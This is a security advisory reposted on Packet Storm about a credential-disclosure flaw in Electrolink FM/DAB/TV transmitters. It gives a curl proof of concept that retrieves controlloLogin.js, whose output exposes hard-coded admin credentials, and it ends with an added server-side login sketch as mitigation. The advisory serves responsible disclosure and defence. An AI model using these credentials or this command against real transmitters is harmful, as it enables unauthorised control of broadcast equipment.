Packet Storm: LiquidWorm, zeroscience.mk (PACKETSTORM:174875)
Oct 02, 2023 - 12:00 a.m.

Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credential Disclosure

packetstormsecurity.com
`  
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure  
  
  
Vendor: Electrolink s.r.l.  
Product web page: https://www.electrolink.com  
Affected version: 10W, 100W, 250W, Compact DAB Transmitter  
                  500W, 1kW, 2kW Medium DAB Transmitter  
                  2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter  
                  100W, 500W, 1kW, 2kW Compact FM Transmitter  
                  3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter  
                  15W - 40kW Digital FM Transmitter  
                  BI, BIII VHF TV Transmitter  
                  10W - 5kW UHF TV Transmitter  
Web version: 01.09, 01.08, 01.07  
Display version: 1.4, 1.2  
Control unit version: 01.06, 01.04, 01.03  
Firmware version: 2.1  
  
Summary: Since 1990 Electrolink has been dealing with design and  
manufacturing of advanced technologies for radio and television  
broadcasting. The most comprehensive products range includes: FM  
Transmitters, DAB Transmitters, TV Transmitters for analogue and  
digital multistandard operation, Bandpass Filters (FM, DAB, ATV,  
DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial  
switches, Manual patch panels, RF power meters, Rigid line and  
accessories. A professional solution that meets broadcasters' needs  
from small community television or radio to big government networks.  
  
Compact DAB Transmitters 10W, 100W and 250W models with 3.5"  
touch-screen display and in-built state of the art DAB modulator,  
EDI input and GPS receiver. All transmitters are equipped with a  
state-of-the-art DAB modulator with excellent performances,  
self-protected and self-controlled amplifiers ensure trouble-free  
non-stop operation.  
  
100W, 500W, 1kW and 2kW power range available on compact 2U and  
3U 19" frame. Built-in stereo coder, touch screen display and  
efficient low noise air cooling system. Available models: 3kW,  
5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters  
with fully broadband solid state amplifiers and an efficient  
low-noise air cooling system.  
  
FM digital modulator with excellent specifications, built-in  
stereo and RDS coder. Digital deviation limiter together with  
ASI and SDI inputs are available. These transmitters are ready  
for ISOFREQUENCY networks.  
  
Available for VHF BI and VHF BIII operation with robust design  
and user-friendly local and remote control. Multi-standard UHF  
TV transmitters from 10W up to 5kW with efficient low noise air  
cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC  
and ISDB-Tb available.  
  
Desc: The device discloses clear-text credentials in  
controlloLogin.js, where the login check compares the submitted  
user name and password against hard-coded values in client-side  
JavaScript. This can allow security bypass and system access.  
  
Tested on: Mbedthis-Appweb/12.5.0  
           Mbedthis-Appweb/12.0.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research & Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience  
  
  
Advisory ID: ZSL-2023-5790  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php  
  
  
30.06.2023  
  
--  
  
  
C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js"  
function verifica() {  
    var user = document.getElementById('user').value;  
    var password = document.getElementById('password').value;  
  
    //alert(user);  
  
    if(user=='admin' && password=='cozzir'){  
        SetCookie('Login','OK',exp);  
        window.location.replace("FrameSetCore.html");  
    }else{  
        SetCookie('Login','NO',exp);  
        window.location.replace("login.html");  
    }  
}  
`
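
A mitigation sketch for the pattern shown in controlloLogin.js, added here as an example and not code from the advisory or the vendor: the credential check and the session state both move to the server, so nothing secret ships in a script and a client-chosen cookie value proves nothing. It uses Node.js built-ins only; the user name, passphrase, timeout and function names are assumptions.

```javascript
// Added example: server-side login check. Names and values here are
// hypothetical and are not taken from the vendor's firmware.
const { scryptSync, randomBytes, timingSafeEqual } = require('node:crypto');

const SESSION_TTL_MS = 15 * 60 * 1000; // assumed session lifetime
const users = new Map();     // username -> { salt, hash }
const sessions = new Map();  // token -> { user, expires }

// Store only a salted scrypt hash; the password itself is never kept.
function addUser(user, password) {
  const salt = randomBytes(16);
  users.set(user, { salt, hash: scryptSync(password, salt, 32) });
}

// Verify on the server and return an unguessable session token, or null.
function login(user, password, now = Date.now()) {
  const rec = users.get(user);
  // Hash even for unknown users so both failure paths cost the same.
  const salt = rec ? rec.salt : Buffer.alloc(16);
  const candidate = scryptSync(String(password), salt, 32);
  if (!rec || !timingSafeEqual(candidate, rec.hash)) return null;
  const token = randomBytes(32).toString('hex');
  sessions.set(token, { user, expires: now + SESSION_TTL_MS });
  return token;
}

// Every protected request is checked against server-held state, so a
// cookie value the client picked for itself (e.g. "OK") authenticates nothing.
function isAuthenticated(token, now = Date.now()) {
  const s = sessions.get(token);
  if (!s) return false;
  if (s.expires <= now) { sessions.delete(token); return false; }
  return true;
}

// Cookie attributes keep the token out of reach of page scripts.
function sessionCookie(token) {
  return `session=${token}; HttpOnly; SameSite=Strict; Path=/`;
}

// Constructed demo credentials; a real device would provision these at setup.
addUser('operator', 'constructed-demo-passphrase');
```
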